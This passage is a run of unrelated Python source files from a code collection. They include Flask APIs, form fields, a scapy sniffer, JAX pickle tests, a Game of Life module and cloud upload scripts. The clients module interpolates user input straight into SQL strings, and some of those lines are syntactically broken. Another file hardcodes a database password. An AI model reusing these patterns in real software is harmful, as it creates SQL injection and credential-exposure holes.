no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.empty_to_default = empty_to_default
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
try:
self.data = ObjectId(value)
except InvalidId:
self.data = None
raise ValueError("invalid ObjectId: '{}'"
.format(values[0]))
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
class TagListField(Field):
def __init__(self, label='', validators=None, sep=",,、",
empty_to_default=True, element_field=None, unique=True,
no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.sep = sep
self.empty_to_default = empty_to_default
self.element_field = element_field
self.unique = unique
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
value = [v.strip() for v in re.split(
r"[{}]".format(self.sep), value)]
value = [v for v in value if v != ""]
if self.unique:
value = list(OrderedDict.fromkeys(value))
self.data = value
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
def post_validate(self, form, stop_validation):
if stop_validation:
return
if self.data is not None and self.element_field is not None:
fields = []
for v in self.data:
field = copy(self.element_field).bind(form, '')
field.process_formdata([v])
if not field.validate(form):
self.errors.extend(field.errors)
else:
fields.append(field)
if len(self.errors) == 0:
self.data = [v.data for v in fields]
class JsonField(Field):
def __init__(self, label=None, validators=None, empty_to_default=True,
no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.empty_to_default = empty_to_default
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
try:
self.data = json.loads(value)
except ValueError:
self.data = None
raise ValueError("invalid json: '{}'"
.format(values[0]))
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
class CompoundField(Field):
def __init__(self, label='', validators=None, empty_to_default=True,
fields=None, no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.empty_to_default = empty_to_default
self.fields = fields or []
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
self.data = value
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
def post_validate(self, form, stop_validation):
if stop_validation:
return
if self.data is not None:
for field in self.fields:
field = field.bind(form, '')
try:
field.process_formdata([self.data])
except ValueError as e:
self.errors.append(str(e))
continue
if not field.validate(form):
self.errors.extend(field.errors)
else:
self.data = field.data
self.errors = []
break
|
8,167 | e98f28199075e55ddad32d9127f917c982e1e29d | import random
def generate_questions(n):
for _ in range(n):
x=random.randint(11,100)
print(x)
inp=int(input())
if inp==x**2:
continue
else:
print('Wrong! the right answer is: {}'.format(x**2))
n=int(input())
generate_questions(n)
|
8,168 | 7ab964352c1d51b70e3a1a7bf0a624f2d96cfd55 | #dependencies go here
import numpy as np
import datetime as dt
from datetime import timedelta
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
#Set up the engine to connect to HW8 database
postgresStr = ("postgresql://postgres:password@localhost:5432/HW8-sqlalchemy-vacation")
engine = create_engine(postgresStr)
# reflect existing tables/classes
Base = automap_base()
Base.prepare(engine, reflect=True)
# Save reference to the tables
Measurement = Base.classes.measurements
Station = Base.classes.station
# Flask Setup
app = Flask(__name__)
# Set up flask routes
@app.route("/")
def home():
"""List all available api routes."""
return (
f"Available Routes:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/>"
f"/api/v1.0/<start><br/>"
f"/api/v1.0/<start>/<end><br/>"
)
@app.route("/api/v1.0/precipitation")
def precip():
#Convert the query results to a Dictionary using `date` as the key and `prcp` as the value.
#Return the JSON representation of your dictionary.
# Create our session (link) from Python to the DB
session = Session(engine)
#query the db, get a list of all precip measurements and dates
results = session.query(Measurement.date, Measurement.prcp).all()
session.close()
# Convert list of tuples into normal list
precip = list(np.ravel(results))
return jsonify(precip)
@app.route("/api/v1.0/stations")
def stations():
#Return a JSON list of stations from the dataset
# Create our session (link) from Python to the DB
session = Session(engine)
#query the db, get a list of the stations and their respective names
results = session.query(Station.station, Station.name).all()
session.close()
# Convert list of tuples into normal list
stationlist = list(np.ravel(results))
return jsonify(stationlist)
#query for the dates and temperature observations from a year from the last data point.
# return a JSON list of Temperature Observations (tobs) for the previous year.
@app.route("/api/v1.0/tobs")
def tobs():
# Create our session (link) from Python to the DB
session = Session(engine)
#find the last date in the dataset, query the prior year's temperature observations
last = session.query(func.max(Measurement.date)).limit(1).all()
q_end = last[0][0].strftime("%Y-%m-%d")
q_start = (last[0][0]-dt.timedelta(days = 365)).strftime("%Y-%m-%d")
tobs_results = session.query(Measurement.date, Measurement.tobs).\
filter(Measurement.date < q_end).\
filter(Measurement.date >= q_start).all()
session.close()
# Convert list of tuples into normal list
tobslist = list(np.ravel(tobs_results))
return jsonify(tobslist)
@app.route("/api/v1.0/<start>")
def startonly(start):
# Create our session (link) from Python to the DB
session = Session(engine)
#find the last date in the dataset to use as an ending point for our temperature calculations
last = session.query(func.max(Measurement.date)).limit(1).all()
q_end = last[0][0].strftime("%Y-%m-%d")
stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= start).\
filter(Measurement.date <= q_end).all()
statslist = list(np.ravel(stats))
return jsonify({"StartDate":start,"EndDate":q_end,"TMIN": statslist[0],"TAVG":statslist[1],"TMAX":statslist[2]})
#Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range.
#When given the start only, calculate `TMIN`, `TAVG`, and `TMAX` for all dates greater than and equal to the start date.
@app.route("/api/v1.0/<start>/<end>")
def daterange(start,end):
# Create our session (link) from Python to the DB
session = Session(engine)
stats2 = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= start).\
filter(Measurement.date <= end).all()
statslist = list(np.ravel(stats2))
return jsonify({"StartDate":start,"EndDate":end,"TMIN": statslist[0],"TAVG":statslist[1],"TMAX":statslist[2]})
#Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range.
#When given the start and the end date, calculate the `TMIN`, `TAVG`, and `TMAX` for dates between the start and end date inclusive.
if __name__ == '__main__':
app.run(debug=True)
|
8,169 | a1115766c5f17abc1ba90a3314cb5b9c4aab73d6 | import vobject
import glob
import sys
vobj=vobject.readOne(open("Nelson.vcf"))
print vobj.contents
def main(args):
suma = 0
titulos = ['nombre del archivo', 'Total', 'subtotoal', 'rfc', 'fecha', 'ivaTrasladado', 'isrTrasladado', 'ivaRetenido', 'isrRetenido']
import csv
out = csv.writer(open("out.csv","w"), delimiter=',',quoting=csv.QUOTE_ALL)
out.writerow(titulos)
for argument in args:
t = datos(argument)
row = []
if not t["rfcEmisor"] in catedraticos:
suma += t["total"]
row.append(argument)
row.append(t['total'])
row.append(t['subTotal'])
row.append(t['rfcEmisor'])
row.append(t['fecha'])
row.append(t['ivat'])
row.append(t['isrt'])
row.append(t['ivar'])
row.append(t['isrr'])
out.writerow(row)
if __name__ == '__main__':
if len(sys.argv[1:]) > 0:
main(sys.argv[1:])
else:
files = glob.glob("*.xml")
if files:
main(files)
else:
raw_input("no hay archivos xml")
|
8,170 | 6c1f7b8e71760cac443a06f68f5f6ee3c2151e50 | # https://leetcode.com/problems/wiggle-subsequence/
#
# algorithms
# Medium (36.9%)
# Total Accepted: 43,722
# Total Submissions: 118,490
# beats 100.0% of python submissions
class Solution(object):
def wiggleMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
length = len(nums)
if length < 2:
return length
dp = [[0] * 2 for _ in xrange(length)]
dp[0] = [1, 1]
for i in xrange(1, length):
if nums[i] > nums[i - 1]:
dp[i][0] += dp[i - 1][1] + 1
dp[i][1] = dp[i - 1][1]
elif nums[i] < nums[i - 1]:
dp[i][1] += dp[i - 1][0] + 1
dp[i][0] = dp[i - 1][0]
else:
dp[i] = dp[i - 1]
return max(dp[-1])
|
8,171 | e4ecc1746e907f11936683384e1edb34dd637de7 | #!/usr/bin/env python
import sys
import struct
import Queue
import logging
import redis
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from threading import Thread
from scapy.all import sniff, sendp, hexdump, get_if_list, get_if_hwaddr
from scapy.all import Packet, IPOption
from scapy.all import PacketListField, ShortField, IntField, LongField, BitField, FieldListField, FieldLenField, ByteField
from scapy.all import Dot1Q, IP, UDP, Raw
from scapy.layers.inet import _IPOption_HDR
from check.verification import Verification
NUM = 0
redis_session = redis.Redis(host='localhost')
def get_if():
ifs=get_if_list()
iface=None
for i in get_if_list():
if "enp0s8" in i:
iface=i
break;
if not iface:
print "Cannot find enp0s8 interface"
exit(1)
return iface
class SwitchTrace(Packet):
fields_desc = [ BitField("swid", 0x0, 6),
BitField("inport", 0x0, 6),
BitField("rule", 0x0, 20)]
def extract_padding(self, p):
return "", p
class IVPOption_MRI(IPOption):
name = "MRI"
option = 31
fields_desc = [ _IPOption_HDR,
FieldLenField("length", None, fmt="B",
length_of="swtraces",
adjust=lambda pkt,l:l*2+4),
ShortField("count", 0),
PacketListField("swtraces",
[],
SwitchTrace,
count_from=lambda pkt:(pkt.count*1)) ]
def check_packet(queue):
while True:
path = queue.get()
verif = Verification()
verif_path = verif.verif_packet(path)
def handle_pkt(pkt, q):
#pkt.show2()
global NUM
count = 0
path = []
vlanid = pkt[Dot1Q].vlan
while (count < pkt['MRI'].count):
swid = pkt['MRI'].swtraces[count].swid
inport = pkt['MRI'].swtraces[count].inport
ruleid = pkt['MRI'].swtraces[count].rule
dst_ip = pkt['IP'].dst
path.insert(0, [dst_ip, swid, inport, ruleid])
count = count + 1
NUM = NUM + 1
q.put([path, NUM, len(path), vlanid])
print("Path %i: %s and vlan ID: %d" % (NUM, path, vlanid))
sys.stdout.flush()
def main():
q = Queue.Queue(maxsize=0)
workers = 5
for i in range(workers):
thread = Thread(target=check_packet, args=(q, ))
thread.setDaemon(True)
thread.start()
iface = 'enp0s8'
print 'Path Format [vlanID, [dst_ip, swID, inport, ruleID], ...]\n'
sys.stdout.flush()
try:
sniff(filter='', iface = iface, prn = lambda x: handle_pkt(x, q))
finally:
for key in redis_session.scan_iter("s*"):
redis_session.delete(key)
if __name__ == '__main__':
main()
|
8,172 | 79c8e87e1d247eef8dd1ca8e307bbe6d25bf48e2 | # Copyright 2021 The JAX Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for interoperability between JAX and pickling libraries."""
import pickle
import unittest
from absl.testing import absltest
from absl.testing import parameterized
try:
import cloudpickle
except ImportError:
cloudpickle = None
import jax
from jax import core
from jax import numpy as jnp
from jax.config import config
from jax.interpreters import pxla
from jax._src import test_util as jtu
config.parse_flags_with_absl()
class CloudpickleTest(jtu.JaxTestCase):
@unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
def testPickleOfJittedFunctions(self):
@jax.jit
def f(x, y):
return x * y
@jax.jit
def g(z):
return f(z, z + 77) # noqa: F821
expected = g(32)
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(32)
self.assertEqual(expected, actual)
@unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77) # noqa: F821
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1),
jax.random.key_data(k2))
@parameterized.parameters(
(pxla.PartitionSpec(),),
(pxla.PartitionSpec(None),),
(pxla.PartitionSpec('x', None),),
(pxla.PartitionSpec(None, 'y'),),
(pxla.PartitionSpec('x', 'y'),),
(pxla.PartitionSpec(('x', 'y'),),),
)
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
def testPickleTracerError(self):
with self.assertRaises(core.ConcretizationTypeError):
jax.jit(pickle.dumps)(0)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
8,173 | 035a87ccf21d45b2c147da4315c2143bea1ff21d | import psycopg2
from .connection import get_connection
def get_clientes():
query = 'SELECT nombre, t_documento ,documento, telefono, direccion, correo, ciudad_circulacion, fecha_nacimiento, comercial, primas FROM clientes'
cursor = get_connection(query)
return cursor
def get_clientes_by_id(_id):
query = f'SELECT nombre, t_documento ,documento, telefono, direccion, correo, ciudad_circulacion, fecha_nacimiento, comercial, primas FROM clientes WHERE documento = {_id}'
get_connection(query, _id)
def get_clientes_by_nombre(nombre):
query = f'SELECT nombre, t_documento ,documento, telefono, direccion, correo, ciudad_circulacion, fecha_nacimiento, comercial, primas FROM clientes WHERE nombre LIKE '%{nombre}%' '
get_connection(query, nombre)
def get_clientes_by_fecha(fecha):
query = f'SELECT nombre, t_documento ,documento, telefono, direccion, correo, ciudad_circulacion, fecha_nacimiento, comercial, primas FROM clientes WHERE nombre LIKE '%{fecha}%' '
get_connection(query, fecha)
def create_pdf():
pass
def add_cliente(parametros):
query = 'INSERT INTO clientes VALUES(%s,%s,%s,%s,%s,%s,%s,%s,NULL,NULL,%s,NULL,%s)'
get_connection(query, parametros)
print("Datos almacenados")
get_clientes()
def edit_cliente(_id, parametros):
query = f'UPDATE clientes SET nombre = %s, documento = %s, t_documento = %s, telefono = %s, direccion = %s, correo = %s, ciudad_circulacion WHERE documento = {_id}'
get_connection(query, parametros)
print("Datos almacenados")
get_clientes()
def delete_cliente(_id):
query = 'DELETE FROM clientes WHERE documento = {_id}'
get_connection(query)
'''
def delete_cliente():
#mensaje['text'] = ''
#try:
#.tabla.item(.tabla.selection())['text'][0]
#except IndexError as e:
# mensaje['text'] = 'Selecciona un producto'
return
#mensaje['text'] = ''
nombre = .tabla.item(.tabla.selection())['text']
query = 'DELETE FROM clientes WHERE nombre = %s'
.get_connection(query, (nombre,))
.mensaje['text'] = 'Cliente {} fue borrado correctamente'.format(nombre)
.get_clientes()
def edit_cliente():
.mensaje['text'] = ''
try:
.tabla.item(.tabla.selection())['text'][0]
except IndexError as e:
.mensaje['text'] = 'Selecciona un producto'
return
nombre = .tabla.item(.tabla.selection())['text']
documento = .tabla.item(.tabla.selection())['values'][0]
.ventana_edit = Toplevel()
.ventana_edit.title = 'Editar cliente'
''' |
8,174 | a18e98db417fe234e3d8d5d1321203fbac18751c | #coding: utf-8
from flask import Flask, redirect, url_for, request
from werkzeug.utils import secure_filename
import torch, torchvision
# Setup detectron2 logger
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()
# import some common libraries
import numpy as np
import os, json, cv2, random
# import some common detectron2 utilities
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import MetadataCatalog, DatasetCatalog
from detectron2.structures import Instances
import os
import sys
app = Flask(__name__)
def init_setup():
cfg = get_cfg()
# add project-specific config (e.g., TensorMask) here if you're not running a model in detectron2's core library
cfg.merge_from_file(model_zoo.get_config_file("COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml"))
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5 # set threshold for this model
# Find a model from detectron2's model zoo. You can use the https://dl.fbaipublicfiles... url as well
cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url("COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml")
cfg.MODEL.DEVICE='cpu'
return cfg
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS']
def detect_object(filename):
PATH_TO_TEST_IMAGES_DIR = app.config['UPLOAD_FOLDER']
TEST_IMAGE_PATH = os.path.join(PATH_TO_TEST_IMAGES_DIR, filename)
PRED_IMAGE_PATH = os.path.join(PATH_TO_TEST_IMAGES_DIR, 'pred_' + filename)
im = cv2.imread(TEST_IMAGE_PATH)
cfg = app.config['detectron2_cfg']
predictor = DefaultPredictor(cfg)
outputs = predictor(im)
# filterout bana and orage
data_set = MetadataCatalog.get(cfg.DATASETS.TRAIN[0])
# print(data_set.thing_classes)
pred_inst = outputs["instances"].to("cpu")
show_inst = []
pred_res = []
for tc in app.config['THING_CLASSES']:
if tc not in data_set.thing_classes:
print("Thing Class:"+ tc +", Not found in the training set")
continue
t_idx = data_set.thing_classes.index(tc)
filt_inst = pred_inst[pred_inst.pred_classes == t_idx]
cat_cnt = len(filt_inst)
if cat_cnt > 0:
show_inst.append(filt_inst)
pred_res.append({"t_class": tc, "t_count":cat_cnt})
if len(show_inst) > 0:
pred_inst = Instances.cat(show_inst)
# Comment this out later
# v = Visualizer(im[:, :, ::-1],data_set , scale=0.3)
# out = v.draw_instance_predictions(pred_inst)
# cv2.imwrite(PRED_IMAGE_PATH, out.get_image()[:, :, ::-1])
response = app.response_class(
response=json.dumps({'result': pred_res}),
status=200,
mimetype='application/json'
)
return response
@app.route("/infer", methods=['POST'])
def infer():
file = request.files['fimg']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return detect_object(filename=filename)
if __name__ == '__main__':
app.config['UPLOAD_FOLDER'] = '/app/imgstore/'
app.config['ALLOWED_EXTENSIONS'] = set(['png', 'jpg', 'jpeg'])
app.config['detectron2_cfg'] = init_setup()
app.config['THING_CLASSES'] = ['banana', 'orange', 'carrot', 'apple', 'bottle']
app.run(debug=False,host='0.0.0.0')
|
8,175 | 1cab38721e6b96a9877bd67cbddaa4d6b4e53d1b | '''
Factory for creating and running ssimulations against optimization tools
Author:
Matthew Barber <mfmbarber@gmail.com>
'''
from .strategy_annealer import StrategyAnnealer
from .strategy_deap import StrategyDeap
class CalulateStrategyWith:
@staticmethod
def Annealing(car, include_initial_tyre=False, iterations=100000):
'''
Use simulated annealing to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
iterations (int): Iteration limit
Returns:
Car
'''
sim = StrategyAnnealer(car)
sim.setIncludeInitialTyreInMove(include_initial_tyre)
sim.steps = iterations
state, e = sim.anneal()
return state
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
'''
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
'''
return StrategyDeap(car, include_initial_tyre, generations).run()
|
8,176 | 2f0d611fecdb5717029938d2ec2cd2db345b8f3a | import boto3
import json
from botocore.exceptions import ClientError
# upload_to_s3("abc.png", 1)
def upload_to_s3(file_name, node_number):
try:
key_info_json = open("awsinfo.json").read()
except FileNotFoundError:
print("awsinfo.json is not exist in dir.")
exit(-1)
data=json.loads(key_info_json)
s3 = boto3.client(
's3',
aws_access_key_id = data['accessKeyId'],
aws_secret_access_key = data['secretAccessKey']
)
with open(file_name, "rb") as f:
s3.upload_fileobj(f,"capstone12", str(node_number)+"/"+file_name,
ExtraArgs={'ACL' : 'public-read-write'}
)
print("File Upload Complete to " + str(node_number) + "/" + file_name) |
8,177 | 80d5cc9871ec753fb9239df7680ac62809baa496 | from cell import Cell
from tkinter import messagebox
import time
import fileTools
class Playground:
"""
The playground for the program. All cells are stored here. This object also import/export cells to the playground
:param screen: The screen object.
:param mouse: The mouse object.
:param keyboard: The keyboard object.
:param root: The root object.
Attributes:
cells: All the cells that is on the playground.
clickSwitch: The size of the one grid box in pixels.
"""
def __init__(self, root, screen, mouse, keyboard):
self.root = root
self.screen = screen
self.mouse = mouse
self.keyboard = keyboard
self.cells = []
self.clickSwitch = False
self.autoGenerateMode = False
self.generation = 0
self.timeToCalcGeneration = 0
self.bindKeyboardKeysToFunctions()
def bindKeyboardKeysToFunctions(self):
"""
Binds diffrent functions to keyboard presses.
:return: (nothing)
"""
self.keyboard.bindFunctionToKey("space", self.nextGeneration)
def updatePlayground(self):
"""
Updates the playground. Checking for user input to interact with the playground.
:return: (nothing)
"""
self.getMouseInput()
if(self.autoGenerateMode):
self.nextGeneration()
def getMouseInput(self):
"""
This method is getting the mouse and doing diffrent thing with it. For example: spawning a new cell if the user click on an grid-box.
:return: (nothing)
"""
xPos = self.mouse.xGridPos
yPos = self.mouse.yGridPos
#Changing the hoverblock color depending if the mouse is hovering over an living cell or not.
if(self.getCellFromPosition(xPos, yPos)):
self.screen.canvas.itemconfig(self.screen.hoverBlock, fill='#ff0000')
else:
self.screen.canvas.itemconfig(self.screen.hoverBlock, fill='#00ff00')
#Placing an cell on the playground if the user is clicking on the playground
if(self.mouse.leftButton and self.clickSwitch == False):
if(self.keyboard.shiftKey):
clickedCell = self.getCellFromPosition(xPos, yPos)
if(clickedCell == False):
self.createCell(xPos, yPos)
else:
self.deleteCell(clickedCell)
self.clickSwitch = True
if (self.mouse.leftButton == False and self.clickSwitch == True):
self.clickSwitch = False
def deleteCell(self, cell):
"""
Deleting a cell from the cell-list.
:param cell: The cell that is going to be delete.
:return: (nothing)
"""
index = self.cells.index(cell)
self.cells[index].delete()
self.cells.remove(cell)
def createCell(self, xPos, yPos):
"""
Creates a new cell for a given position.
:param xPos: The x-position on the grid.
:param yPos: the y-position on the grid
:return: (nothing)
"""
self.cells.append(Cell(self.screen, xPos, yPos))
def getCellFromPosition(self, xPos, yPos):
"""
Gets a cell from a given position.
:param xPos: The x-position on the grid.
:param yPos: the y-position on the grid
:return: Cell
"""
for cell in self.cells:
if(xPos == cell.x and yPos == cell.y):
return cell
return False
def clearPlayground(self):
"""
Removes all the cells from the playground
:return: (nothing)
"""
for cell in self.cells:
cell.delete()
self.cells = []
self.generation = 0
def importPlayground(self, filepath):
"""
This function is importing a playground.
:param filepath: The filepath to import the playground to.
:return: (nothing)
"""
cellOutOfBound = False
avgXPos = 0
avgYPos = 0
fileWrite = open(filepath, "r")
cellPositions = fileWrite.readlines()
self.clearPlayground()
for cellPos in cellPositions:
#Cleans the string
cleanCellPos = fileTools.cleanString(cellPos)
if(cleanCellPos == ""):
continue
#Check the format.
cleanCellPos = self.checkFileFormat(cleanCellPos)
if(cleanCellPos):
cellXPos, cellYPos = cleanCellPos
else:
return
#Checks if the coords is outside the world.
if(cellXPos > self.screen.worldSize or cellYPos > self.screen.worldSize or cellXPos < 0 or cellYPos < 0):
cellOutOfBound = True
else:
newCell = Cell(self.screen, cellXPos, cellYPos)
rectCellPos = self.screen.canvas.coords(newCell.rect)
avgXPos += rectCellPos[0]; avgYPos += rectCellPos[1]
self.cells.append(newCell)
#Print warning that some cells are not renderd.
if(cellOutOfBound):
messagebox.showwarning("Warning!", "Some cells are placed outside of the playground!")
#Moving the user to where the cells are.
avgXPos /= len(cellPositions); avgYPos /= len(cellPositions)
self.screen.offsetX += avgXPos - self.screen.width/2
self.screen.offsetY += avgYPos - self.screen.height/2
def exportPlayground(self, filepath):
"""
This function is exporting a playground.
:param filepath: The filepath to export the playground to.
:return: (nothing)
"""
cellPositions = ""
for cell in self.cells:
if(cell.dead == False):
cellPositions += str(cell.x) + " " + str(cell.y) + "\n"
fileWrite = open(filepath, "w")
fileWrite.write(cellPositions)
fileWrite.close()
def checkFileFormat(self, cellPos):
"""
Checks if the file has the right format for this program.
:param fileContent: The content of the file
:return: The positions in a tuple, (x, y), false if there is an error.
"""
try:
cellPosList = cellPos.split()
cellXPos = int(cellPosList[0])
cellYPos = int(cellPosList[1])
except ValueError:
messagebox.showerror("Error: Wrong format", "The choosen file do not have the correct format. Be so kind to choose an other file.")
return False
pass
return (cellXPos, cellYPos)
def removeCells(self, cellArray):
"""
Deletes all the cells from the array and playground.
:param cellArray: The array of cells to delete.
:return: (nothing)
"""
for cell in cellArray:
cell.delete()
self.cells.remove(cell)
def setNeighbors(self):
"""
Creates dead cells around all living cells and calculating all the neighbors for the dead and the living cells
:return: (nothing)
"""
for cellIndex in range(len(self.cells)):
cell = self.cells[cellIndex]
#Checks the 8 cells around the living one.
for neighborsX in range(cell.x - 1, cell.x + 2):
for neighborsY in range(cell.y - 1, cell.y + 2):
#If the position is outside the world, loop around.
neighborsX = neighborsX % self.screen.worldSize
neighborsY = neighborsY % self.screen.worldSize
#Skipping itself. Becouse we do not want to calculate itself as a neighbor
if(neighborsX == cell.x and neighborsY == cell.y):
continue
else:
#Checks if a cell exist at neighborsX, neighborsY
cellToCheck = self.getCellFromPosition(neighborsX, neighborsY)
if(cellToCheck != False):
#Add one to the neighbor var if there already exist and cell for the given position.
cellToCheck.numOfNeighbor += 1
else:
#Creates a new cell if it do not exist any.
newCell = Cell(self.screen, neighborsX, neighborsY, True)
newCell.numOfNeighbor += 1
self.cells.append(newCell)
def checkAmountOfNeighbors(self):
"""
Check the amount of neighbors and kills or creates new cell depending on the amount.
:return: (nothing)
"""
cellsToDelete = []
for cell in self.cells:
if(cell.numOfNeighbor > 3 or cell.numOfNeighbor < 2 or (cell.numOfNeighbor == 2 and cell.dead == True)):
cellsToDelete.append(cell)
elif(cell.numOfNeighbor == 3 and cell.dead == True):
cell.makeAlive()
cell.numOfNeighbor = 0
self.removeCells(cellsToDelete)
def nextGeneration(self):
"""
This method is updating the cells to the next generation.
:return: (nothing)
Thanks to Martins for the idea to have modolu of the current posotion.
"""
# Start a timer to calculate the time the render one generation.
startTime = int(round(time.time() * 100000))
self.generation += 1
self.setNeighbors()
self.checkAmountOfNeighbors()
# Ends a timer to calculate the time the render one generation.
endTime = int(round(time.time() * 100000))
self.timeToCalcGeneration = (endTime - startTime)
|
8,178 | 0eab23f4271f724da587707599eb0cbf2144efa1 | # zip(),可以压缩 N 个列表成为一个zip对象(可迭代对象)。
a =['a', 'b', 'c']
b =[1, 2, 3]
[x for x in zip(a, b)] # [('a', 1), ('b', 2), ('c', 3)]
# 列表长度不等时,以短的为准
c =['x','y']
[x for x in zip(a, c)] # [('a', 'x'), ('b', 'y')]
# 例子
books =['简爱','小王子','瓦尔登湖']
prices =[56, 78, 66]
for book, price in zip(books, prices):
print("%s的价格是:%3.1f"% (book, price))
# reversed() 实现反向遍历,参数可以是各种序列
[y for y in reversed(b)] # [3, 2, 1]
# sorted() 接受一个可迭代对象,返回其升序。可传参数,reverse=True,key=?(排序关键字)
for book in sorted(books, reverse=True, key=len):
print(book) |
8,179 | 01467a4dad3255a99025c347469881a71ffbae7c | import os
from google.cloud import bigquery
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [
bigquery.SchemaField('id', 'INTEGER'),
bigquery.SchemaField('first_name', 'STRING'),
bigquery.SchemaField('last_name', 'STRING'),
bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'),
bigquery.SchemaField('ip_address', 'STRING')
]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
# get the URI for uploaded CSV in GCS from 'data'
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
# lets do this
load_job = client.load_table_from_uri(
uri,
dataset_ref.table(os.environ['TABLE']),
job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result() # wait for table load to complete.
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))
print('Loaded {} rows.'.format(destination_table.num_rows)) |
8,180 | 14023785983f493af57189b3d96254efef2e33ae | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2016-03-15 16:39:32
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from widgets.favorits.favorit_win import Ui_DialogFavorit
import json
import re
from widgets.input_link import def_url
#from favorit_win import Ui_DialogFavorit
class Favorits(QDialog, Ui_DialogFavorit):
"""docstring for Favorits"""
